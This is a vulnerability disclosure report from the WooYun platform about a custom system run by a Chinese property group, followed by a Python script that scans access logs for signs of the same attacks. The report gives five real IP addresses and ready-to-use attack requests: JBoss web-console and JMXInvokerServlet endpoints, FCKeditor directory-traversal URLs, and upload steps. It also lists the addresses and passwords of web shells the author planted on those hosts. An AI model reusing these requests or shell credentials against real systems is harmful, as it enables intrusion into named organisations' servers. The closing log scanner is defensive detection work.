
Vulnerability Summary

Defect ID: wooyun-2016-0171509

Title: Bundle of generic vulnerabilities in a custom system of 建业住宅集团 (Jianye Residential Group)

Affected vendor: 建业住宅集团(中国)有限公司 (Jianye Residential Group (China) Co., Ltd.)

Author: 路人甲

Submitted: 2016-01-21 15:33

Fixed: 2016-03-05 09:52

Disclosed: 2016-03-05 09:52

Vulnerability type: Design flaw / logic error

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]



Vulnerability Details

Disclosure status:

2016-01-21: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-03-05: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Bundle of generic vulnerabilities (getshell via misconfiguration, getshell via command execution, getshell via file upload, directory traversal)

Detailed description:

Affected hosts (all running the same custom system):

http://218.28.132.194/ (建业集团, Jianye Group)
http://61.163.95.187/ (建业控股, Jianye Holdings)
http://218.28.3.86/ (建业物业, Jianye Property Management)
http://218.29.103.146/ (建业泰宏, Jianye Taihong)
http://61.163.86.141:8080/ (建业集团, Jianye Group)
and others.

This custom system uses JBoss as its middleware, and unfortunately the JBoss instance is misconfigured: the web console is exposed without authentication.

Web console: http://218.28.132.194/web-console

[Screenshot: QQ截图20160120221649.png]

A shell is obtained directly through the console.

[Screenshot: QQ截图20160120222134.png]

Command shell: http://218.28.132.194/jbossass/jbossass.jsp

Web console: http://61.163.95.187/web-console

[Screenshot: QQ截图20160120221446.png]

[Screenshot: QQ截图20160120222317.png]

Command shell: http://61.163.95.187/jbossass/jbossass.jsp

Web console: http://218.28.3.86/web-console

[Screenshot: QQ截图20160120221518.png]

[Screenshot: QQ截图20160120222428.png]

Command shell: http://218.28.3.86/jbossass/jbossass.jsp

Web console: http://218.29.103.146/web-console/

[Screenshot: QQ截图20160120221743.png]

[Screenshot: QQ截图20160120222520.png]

Command shell: http://218.29.103.146/jbossass/jbossass.jsp

Web console: http://61.163.86.141:8080/web-console/

[Screenshot: QQ截图20160120221839.png]

[Screenshot: QQ截图20160120222624.png]

Command shell: http://61.163.86.141:8080/jbossass/jbossass.jsp

Proof of vulnerability:

The same hosts also expose the JBoss invoker servlet, which allows command execution through Java deserialization:

http://218.28.132.194/invoker/JMXInvokerServlet

[Screenshot: QQ截图20160120222724.png]

http://61.163.95.187/invoker/JMXInvokerServlet

[Screenshot: QQ截图20160120222744.png]

http://218.28.3.86/invoker/JMXInvokerServlet

[Screenshot: QQ截图20160120222804.png]

http://218.29.103.146/invoker/JMXInvokerServlet

[Screenshot: QQ截图20160120222824.png]

http://61.163.86.141:8080/invoker/JMXInvokerServlet

[Screenshot: QQ截图20160120222841.png]

The system also uses FCKeditor as its rich-text editor, and it is likewise misconfigured: the JSP connector is reachable and accepts a CurrentFolder value that traverses out of the upload directory.

http://218.28.132.194/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../

[Screenshot: QQ截图20160120223024.png]

http://61.163.95.187/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../

[Screenshot: QQ截图20160120223052.png]

Because every host runs the same program, the paths are essentially identical.

http://218.28.3.86/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../

[Screenshot: QQ截图20160120223124.png]

http://218.29.103.146/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../

[Screenshot: QQ截图20160120223143.png]

http://61.163.86.141:8080/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../

[Screenshot: QQ截图20160120223203.png]

Where there is directory listing there is, of course, file upload as well. The file browser can be pointed at the connector:

http://218.28.132.194/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://218.28.132.194/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector

[Screenshot: QQ截图20160120223416.png]

A JSP shell can be uploaded directly. Requests for .jsp files are redirected to the login page, so a .jspx file was uploaded instead.

Address: http://218.28.132.194/UserFiles/File/index.jspx
Password: 7788wpp

[Screenshot: QQ截图20160120223709.png]

http://61.163.95.187/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://61.163.95.187/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector

[Screenshot: QQ截图20160120223915.png]

Address: http://61.163.95.187/UserFiles/File/index.jspx
Password: 023

[Screenshot: QQ截图20160120223943.png]

http://218.28.3.86/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://218.28.3.86/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector

[Screenshot: QQ截图20160120224037.png]

Address: http://218.28.3.86/UserFiles/File/index.jspx
Password: 023

[Screenshot: QQ截图20160120224112.png]

http://218.29.103.146/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://218.29.103.146/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector

[Screenshot: QQ截图20160120224156.png]

Address: http://218.29.103.146/UserFiles/File/index.jspx
Password: 023

[Screenshot: QQ截图20160120224224.png]

http://61.163.86.141:8080/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=http://61.163.86.141:8080/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector

[Screenshot: QQ截图20160120224312.png]

Address: http://61.163.86.141:8080/UserFiles/File/index.jspx
Password: 023

[Screenshot: QQ截图20160120224340.png]

Fix recommendations:

Configure FCKeditor correctly (disable or restrict the file-manager connector), configure JBoss correctly (restrict access to the web console and the invoker servlets), and remove the uploaded shells.
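Beyond removing the shells, an operator of a system like this needs to know whether the exposures above were ever used. The following Python script is an added example, not code from the report or from the vendor's system: it scans web-server access logs for the request patterns described here (JBoss administrative consoles and the invoker servlet, FCKeditor connector calls whose CurrentFolder traverses upward or whose Command is FileUpload, and successful requests for .jsp/.jspx files served from the UserFiles upload directory). The log lines are constructed samples in combined-log format, and the /jmx-console and /admin-console paths are the other stock JBoss AS consoles, assumed here rather than taken from the report.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in combined-log format (not taken from the report).
# Client addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = "\n".join([
    '198.51.100.7 - - [20/Jan/2016:22:16:49 +0800] "GET /web-console/ HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Jan/2016:22:21:34 +0800] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 220',
    '198.51.100.7 - - [20/Jan/2016:22:27:24 +0800] "POST /invoker/JMXInvokerServlet HTTP/1.1" 500 1800',
    '198.51.100.7 - - [20/Jan/2016:22:30:24 +0800] "GET /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=..%2F..%2F HTTP/1.1" 200 930',
    '198.51.100.7 - - [20/Jan/2016:22:34:16 +0800] "POST /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 310',
    '198.51.100.7 - - [20/Jan/2016:22:37:09 +0800] "GET /UserFiles/File/index.jspx HTTP/1.1" 200 44',
    '203.0.113.5 - - [20/Jan/2016:22:40:00 +0800] "GET /index.jsp HTTP/1.1" 200 8000',
])

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# JBoss AS endpoints that should not be reachable from untrusted networks.
# /web-console is the one shown in the report; /jmx-console and /admin-console
# are the other stock consoles (assumed here, not from the report).
JBOSS_ADMIN_PREFIXES = ("/web-console", "/jmx-console", "/admin-console")
JBOSS_INVOKER_PREFIX = "/invoker/"           # e.g. /invoker/JMXInvokerServlet
FCK_CONNECTOR_MARKER = "/fckeditor/editor/filemanager/"
UPLOAD_DIR_PREFIX = "/userfiles/"
SERVER_SIDE_EXTS = (".jsp", ".jspx")


def classify(target, status):
    """Return the list of finding tags for one request target and status code."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    # Lower-case the query keys; parse_qs already percent-decodes the values once.
    query = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
    findings = []

    if path.startswith(JBOSS_ADMIN_PREFIXES):
        findings.append("jboss-admin-console")
    if path.startswith(JBOSS_INVOKER_PREFIX):
        findings.append("jboss-invoker-deserialization")

    if FCK_CONNECTOR_MARKER in path:
        # Decode a second time so a double-encoded "..%252F" is still caught.
        folder = unquote(query.get("currentfolder", ""))
        if ".." in folder.replace("\\", "/").split("/"):
            findings.append("fckeditor-traversal")
        if query.get("command", "").lower() == "fileupload":
            findings.append("fckeditor-upload")

    # A server-side script answered successfully from the upload directory:
    # in the report this is exactly how the dropped .jspx shell was reached.
    if (path.startswith(UPLOAD_DIR_PREFIX) and path.endswith(SERVER_SIDE_EXTS)
            and status.startswith("2")):
        findings.append("script-served-from-upload-dir")
    return findings


def scan_log(text):
    """Return (ip, target, tag) triples for every log line that matches a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for tag in classify(m["target"], m["status"]):
            hits.append((m["ip"], m["target"], tag))
    return hits


def summarize(hits):
    """Count findings per tag, e.g. to drive an alert threshold."""
    counts = {}
    for _ip, _target, tag in hits:
        counts[tag] = counts.get(tag, 0) + 1
    return counts


if __name__ == "__main__":
    for ip, target, tag in scan_log(SAMPLE_LOG):
        print(f"{tag:32} {ip:14} {target}")
```

Run it against real Tomcat or JBoss access logs by replacing SAMPLE_LOG with the file contents; any hit on the JBoss or FCKeditor rules from an external address is worth an incident ticket, and a "script-served-from-upload-dir" hit identifies the exact file to quarantine before the configuration is fixed.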

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability Response

Vendor response:

The vendor could not be contacted, or the vendor actively declined to respond.